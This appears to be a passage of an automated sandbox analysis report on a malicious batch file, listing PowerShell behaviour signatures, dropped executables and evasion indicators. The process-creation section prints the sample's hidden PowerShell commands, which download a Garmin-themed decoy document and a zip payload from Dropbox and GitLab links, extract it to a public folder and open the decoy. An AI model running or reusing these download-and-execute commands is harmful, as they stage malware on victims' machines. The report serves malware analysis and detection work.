                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4145Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5690Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5880Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 421Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4149Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5696Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1824Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep count: 4145 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep count: 5690 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 940Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep count: 5880 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6572Thread sleep count: 421 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 4149 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6632Thread sleep count: 5696 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep count: 1824 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1712Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep count: 69 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 0000000E.00000002.3304020043.000002C724E15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 0000000C.00000002.2169790015.0000028C26960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_5616.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_6164.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5616, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6164, type: MEMORYSTR
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v3.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'c:\users\public\document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v3.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'c:\users\public\document.zip')"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
